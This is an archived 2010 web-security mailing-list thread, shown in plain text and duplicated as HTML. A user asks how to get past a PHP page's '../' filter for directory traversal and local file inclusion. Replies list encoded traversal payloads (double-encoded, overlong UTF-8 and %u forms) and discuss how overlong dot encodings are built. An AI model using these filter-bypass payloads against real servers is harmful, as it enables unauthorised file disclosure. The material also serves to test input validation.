[prev in list] [next in list] [prev in thread] [next in thread]
List: websecurity
Subject: Re: [WEB SECURITY] ../ filtered
From: NeZa <neza0x () gmail ! com>
Date: 2010-02-22 20:51:40
Message-ID: 594f48571002221251h34525ba9m78d875f0052272be () mail ! gmail ! com
[Download RAW message or body]
Hey Shlomi, excelent tips, but wondering if you have written about how to
convert from hex to utf-8, in order to create my own tests.
I mean, as you know, %2e can be utf-8converted to:
C0 AE (11000000 10101110)
E0 80 AE (11100000 10000000 10101110)
F0 80 80 AE (11110000 10000000 10000000 10101110)
F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)
FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)
But i do not understand how it was converted from %2e to %C0 %AE and others.
Any documentation?
On Mon, Feb 22, 2010 at 3:51 AM, Shlomi Narkolayev <shlominar@gmail.com>wrote:
> If ".." is rejected, so try these:
> %c0%ae%c0%ae\FILENAME
> %uff0e%uff0e/FILENAME
> %c0%ae%c0%ae/FILENAME
> %2e%2e%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> %2e%2e%2fFILENAME
>
> If you still need more combinations, check my \
> blog<http://narkolayev-shlomi.blogspot.com/>in a few days for the full list.
>
> Kind Regards,
> Narkolayev Shlomi.
>
>
>
>
> *From:* Beatriz Duran [mailto:beatrizdrn@yahoo.com]
> *Sent:* Tuesday, February 16, 2010 4:40 PM
>
> *To:* Shlomi Narkolayev; websecurity@webappsec.org
> *Subject:* Re: [WEB SECURITY] ../ filtered
>
>
>
> Shlomi,
>
> I tried those already; but they and the ones with ".." are rejected, the
> variable is verifying the string before running it and with the combination:
>
>
> %252e%252e/FILENAME happens this:
>
> viewfiles.php?folder=%252e%252e/
>
> The 25s are removed, the so the %2e%2e are left but transformed in pure
> text so the page reports that the directory %2e%2e doesn't exist; but if I
> apply purely viewfiles.php?folder=%2e%2e/ the page reject them and say ..
> are not allowed.
>
>
>
>
>
>
> I Have Learned So much from God That I can no longer Call Myself A
> Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much
> of Itself With me That I can no longer call myself A man, a woman, and angel
> Or even pure Soul. Love has Befriended Hafiz so completely It has turned to
> ash And freed Me Of every concept and image My mind has ever known. –Hafiz,
> Persian poet (1315 – 1390)
>
>
>
>
> ------------------------------
>
> *From:* Shlomi Narkolayev <shlominar@gmail.com>
> *To:* beatrizdrn@yahoo.com; websecurity@webappsec.org
> *Sent:* Tue, February 16, 2010 12:41:16 AM
> *Subject:* RE: [WEB SECURITY] ../ filtered
>
> Try these:
> ..%5c..%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> ..%c0%af..%c0%afFILENAME
> ..%255c..%255cFILENAME
> %252e%252e/FILENAME
> ..%2f..%2fFILENAME
> ..%252f..%252fFILENAME
>
>
> Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> new
> 1400 variants for directory traversal.
>
> Kind Regards,
> Narkolayev Shlomi.
>
>
>
> *From:** Beatriz Duran [mailto:beatrizdrn@yahoo.com]
> Sent: Monday, February 15, 2010 9:43 AM
> To: websecurity@webappsec.org
> Subject: [WEB SECURITY] ../ filtered*
>
>
>
> Hi, I need to find a vulnerability in a url that could be exploited for
> directory traversal and LFI; the page is working with PHP but it is
> filtering /../ and also /%2e%2e/, because the pace is using ISO for Latin
> characters I can't use unicode extended because it reinterpret with other
> values; is there another way to work around the filter?
>
>
>
>
>
>
>
--
NeZa
Hacker Wanna Be from Nezahualcoyotl
[Attachment #3 (text/html)]
Hey Shlomi, excelent tips, but wondering if you have written about how to convert \
from hex to utf-8, in order to create my own tests. <br>I mean, as you know, %2e can \
be utf-8converted to:<br><br>C0 AE (11000000 10101110)<br> <br>E0 80 AE (11100000 \
10000000 10101110)<br><br>F0 80 80 AE (11110000 10000000 10000000 10101110)<br><br>F8 \
80 80 80 AE (11111000 10000000 10000000 10000000 10101110)<br><br>FC 80 80 80 80 AE \
(11111100 10000000 10000000 10000000 10000000 10101110) <br> <br>But i do not \
understand how it was converted from %2e to %C0 %AE and others.<br><br>Any \
documentation?<br><br><div class="gmail_quote">On Mon, Feb 22, 2010 at 3:51 AM, \
Shlomi Narkolayev <span dir="ltr"><<a \
href="mailto:shlominar@gmail.com">shlominar@gmail.com</a>></span> wrote:<br> \
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); \
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"><div dir="ltr"><div \
class="gmail_quote"><div dir="ltr"><div style="margin: 0in 0in 0pt;" \
class="MsoNormal"> <span style="color: rgb(31, 73, 125); font-size: \
11pt;"><span><font face="Times New Roman" size="3"><font color="#000000">If \
".." is rejected, so try these:<br>
</font></font></span></span></div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000">%c0%ae%c0%ae\FILENAME</font></font></span></span></div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000"><font face="Times New Roman" \
size="3">%uff0e%uff0e/FILENAME</font></font></font></span></span></div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span></span></span><span style="color: rgb(31, 73, 125); \
font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000">%c0%ae%c0%ae/FILENAME</font></font></span></span></div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000">%2e%2e%5cFILENAME</font></font></span></span></div> <div class="im">
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span></span></span><span style="color: rgb(31, 73, 125); \
font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000">%2e%2e\%2e%2e\FILENAME</font></font></span></span></div>
</div><div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, \
73, 125); font-size: 11pt;"><span></span></span><span style="color: rgb(31, 73, 125); \
font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000">%2e%2e%2fFILENAME</font></font></span></span></div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font color="#000000" face="Times New Roman" \
size="3"></font></span></span> </div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font color="#000000" face="Times New Roman" \
size="3">If you still need more combinations, check my <a \
href="http://narkolayev-shlomi.blogspot.com/" target="_blank">blog</a> in a few days \
for the full list.</font></span></span></div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span></span></span> </div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000"></font></font></span></span> </div>
<div style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"><span><font face="Times New Roman" size="3"><font \
color="#000000">Kind Regards,<br>
Narkolayev Shlomi.</font></font></span></span></div>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><br></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><span style="color: rgb(31, 73, \
125); font-size: 11pt;"> </span></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><b><span style="font-size: \
10pt;">From:</span></b><span style="font-size: 10pt;"> Beatriz Duran [mailto:<a \
href="mailto:beatrizdrn@yahoo.com" target="_blank">beatrizdrn@yahoo.com</a>] <br>
<b>Sent:</b> Tuesday, February 16, 2010 4:40 PM<div><div></div><div \
class="h5"><br><b>To:</b> Shlomi Narkolayev; <a \
href="mailto:websecurity@webappsec.org" \
target="_blank">websecurity@webappsec.org</a><br><b>Subject:</b> Re: [WEB SECURITY] \
../ filtered</div> </div></span></p><div><div></div><div class="h5">
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><font face="Times New Roman" \
size="3"> </font></p> <p style="margin: 0in 0in 12pt;" class="MsoNormal"><span><font \
size="3">Shlomi,<br><br>I tried those already; but they and the ones with \
".." are rejected, the variable is verifying the string before running it \
and with the combination: <br>
<br>%252e%252e/FILENAME happens \
this:<br><br>viewfiles.php?folder=%252e%252e/<br><br>The 25s are removed, the so the \
%2e%2e are left but transformed in pure text so the page reports that the directory \
%2e%2e doesn't exist; but if I apply purely viewfiles.php?folder=%2e%2e/ the \
page reject them and say .. are not allowed.<br>
<br><br><br><br></font></span></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><span><font size="3"> \
</font></span></p> <p style="margin: 0in 0in 0pt;" class="MsoNormal"><span><font \
size="3">I Have Learned So much from God That I can no longer Call Myself A \
Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much of \
Itself With me That I can no longer call myself A man, a woman, and angel Or even \
pure Soul. Love has Befriended Hafiz so completely It has turned to ash And freed Me \
Of every concept and image My mind has ever known. –Hafiz, Persian poet (1315 – \
1390)</font></span></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><span><font size="3"> \
</font></span></p> <p style="margin: 0in 0in 0pt;" class="MsoNormal"><span><font \
size="3"> </font></span></p> <div style="margin: 0in 0in 0pt; text-align: center;" \
class="MsoNormal" align="center"><span style="font-size: 10pt;"><font size="3"> <hr \
align="center" size="1" width="100%"> </font></span></div>
<p style="margin: 0in 0in 12pt;" class="MsoNormal"><b><span style="font-size: \
10pt;">From:</span></b><span style="font-size: 10pt;"> Shlomi Narkolayev <<a \
href="mailto:shlominar@gmail.com" target="_blank">shlominar@gmail.com</a>><br>
<b>To:</b> <a href="mailto:beatrizdrn@yahoo.com" \
target="_blank">beatrizdrn@yahoo.com</a>; <a href="mailto:websecurity@webappsec.org" \
target="_blank">websecurity@webappsec.org</a><br><b>Sent:</b> Tue, February 16, 2010 \
12:41:16 AM<br>
<b>Subject:</b> RE: [WEB SECURITY] ../ filtered</span><span></span></p>
<p style="margin: 0in 0in 12pt;" class="MsoNormal"><span><font face="Times New Roman" \
size="3">Try these:<br>..%5c..%5cFILENAME<br>%2e%2e\%2e%2e\FILENAME<br>..%c0%af..%c0%afFILENAME<br>
..%255c..%255cFILENAME<br>%252e%252e/FILENAME<br>..%2f..%2fFILENAME<br>..%252f..%252fFILENAME<br><br><br>Soon \
I'll upload to my </font><a href="http://narkolayev-shlomi.blogspot.com/" \
target="_blank"><font color="#800080" face="Times New Roman" \
size="3">blog</font></a><font size="3"><font face="Times New Roman"> new 1400 \
variants for directory traversal.<br>
<br clear="all">Kind Regards,<br>Narkolayev Shlomi.</font></font></span></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><font face="Times New Roman"><span \
style="color: rgb(31, 73, 125); font-size: 11pt;"> </span></font></p> <p \
style="margin: 0in 0in 0pt;" class="MsoNormal"><b><i><span style="font-size: \
10pt;"><font face="Times New Roman">From:</font></span></i></b><i><span \
style="font-size: 10pt;"><font face="Times New Roman"> Beatriz Duran \
[mailto:</font><a href="mailto:beatrizdrn@yahoo.com" target="_blank"><font \
face="Times New Roman">beatrizdrn@yahoo.com</font></a><font face="Times New Roman">] \
<br>
<b>Sent:</b> Monday, February 15, 2010 9:43 AM<br><b>To:</b> </font><a \
href="mailto:websecurity@webappsec.org" target="_blank"><font face="Times New \
Roman">websecurity@webappsec.org</font></a><br><font face="Times New \
Roman"><b>Subject:</b> [WEB SECURITY] ../ filtered</font></span></i><font face="Times \
New Roman"><span style="font-size: 10pt;"> </span></font></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><font size="3"><font face="Times \
New Roman"> </font></font></p> <p style="margin: 0in 0in 0pt;" \
class="MsoNormal"><font size="3"><font face="Times New Roman"><span style="color: \
black;">Hi, I need to find a vulnerability in a url that could be exploited for \
directory traversal and LFI; the page is working with PHP but it is filtering /../ \
and also /%2e%2e/, because the pace is using ISO for Latin characters I can't \
use unicode extended because it reinterpret with other values; is there another way \
to work around the filter?</span></font></font></p>
<p style="margin: 0in 0in 0pt;" class="MsoNormal"><font size="3"><font face="Times \
New Roman"> </font></font></p> <p style="margin: 0in 0in 0pt;" \
class="MsoNormal"><span><font face="Times New Roman" size="3"> \
</font></span></p></div></div></div> <br></div><br></div>
</blockquote></div><br><br clear="all"><br>-- <br>NeZa<br>Hacker Wanna Be from \
Nezahualcoyotl<br>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic